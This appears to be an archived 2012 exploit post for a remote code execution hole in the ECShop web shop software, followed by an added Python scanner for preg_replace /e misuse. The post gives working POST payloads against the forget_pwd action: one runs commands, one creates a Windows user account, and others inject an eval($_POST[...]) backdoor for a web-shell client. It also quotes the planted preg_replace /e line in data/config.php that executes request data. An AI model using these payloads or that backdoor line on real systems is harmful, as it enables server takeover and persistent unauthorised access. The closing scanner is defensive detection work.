ECShop remote code execution vulnerability exp

2012-08-12T00:00:00
ID MYHACK58:62201234590
Type myhack58
Reporter Anonymous
Modified 2012-08-12T00:00:00

Description

ECShop version unknown; it appears to be 09.

The server process runs with SYSTEM privileges.

act=forget_pwd&action=get_pwd&email=${@print(system('net user'))}&user_name=furybijj

No result.

After removing system and switching to backticks (%60):

act=forget_pwd&action=get_pwd&email=$%7B@print(%60net user SUPPORT_388945a1 lifelongz%60)%7D&user_name=furybijj

That succeeded.

In fact, this can also be used directly with a chopper connection.

In the configuration, write:

www.xxxx.com

<O>act=forget_pwd&action=get_pwd&email=${eval($_POST[test])}&user_name=furybijj</O>

The main exploit code is as follows:

act=forget_pwd&action=get_pwd&email=%24%7b%40print%28%60net%20user%60%29%7d&user_name=furybijj

act=forget_pwd&action=get_pwd&email=%24%7b%40eval%28%24_POST%5bfuck%5d%29%7d&user_name=furybijj

The cause of the vulnerability is the following code in

data/config.php

define('EC_CHARSET','utf-8');

@preg_replace("/[email]/e",$_POST['email'],"error");
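
With the /e modifier, preg_replace evaluates the replacement string as PHP code, so the line above executes whatever arrives in the email POST field. The following scanner is an added example, not part of the original post: it flags preg_replace calls that use /e and marks those whose replacement comes from request data. The function names, the severity labels and the sample file are assumptions constructed for illustration, and only same-character pattern delimiters are handled.

```python
import re

# Request-controlled PHP superglobals.
TAINTED = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
# One preg_replace(...) statement; arguments captured up to the closing ");".
CALL = re.compile(r"preg_replace\s*\((.*?)\)\s*;", re.S | re.I)
# Quoted PCRE pattern: same-character delimiters, then the modifier letters.
PATTERN = re.compile(r"""^(['"])(\W)(?:\\.|(?!\2).)*\2([A-Za-z]*)\1$""", re.S)

def split_args(text):
    """Split a PHP argument list on top-level commas (quote and bracket aware)."""
    args, buf, depth, quote, prev = [], [], 0, None, ""
    for ch in text:
        if quote:
            if ch == quote and prev != "\\":
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == "," and depth == 0:
            args.append("".join(buf).strip())
            buf = []
            continue
        else:
            depth += (ch in "([") - (ch in ")]")
        buf.append(ch)
        prev = ch
    args.append("".join(buf).strip())
    return args

def find_eval_replace(php_source):
    """Return (line, severity, statement) for each preg_replace using /e."""
    findings = []
    for m in CALL.finditer(php_source):
        args = split_args(m.group(1))
        pat = PATTERN.match(args[0]) if args else None
        if not pat or "e" not in pat.group(3) or len(args) < 2:
            continue
        severity = "tainted" if TAINTED.search(args[1]) else "review"
        line = php_source.count("\n", 0, m.start()) + 1
        findings.append((line, severity, m.group(0)))
    return findings

# Constructed sample: the two data/config.php lines from the page plus two other calls.
SAMPLE = """<?php
define('EC_CHARSET','utf-8');
@preg_replace("/[email]/e",$_POST['email'],"error");
$a = preg_replace('/\\s+/', ' ', $title);
$b = preg_replace('#(\\w+)#e', 'strtoupper("$1")', $title);
"""
```

Running find_eval_replace over every .php file in a web root and treating any "tainted" hit as an incident is a reasonable first triage; "review" hits are legacy /e use that should be migrated to preg_replace_callback.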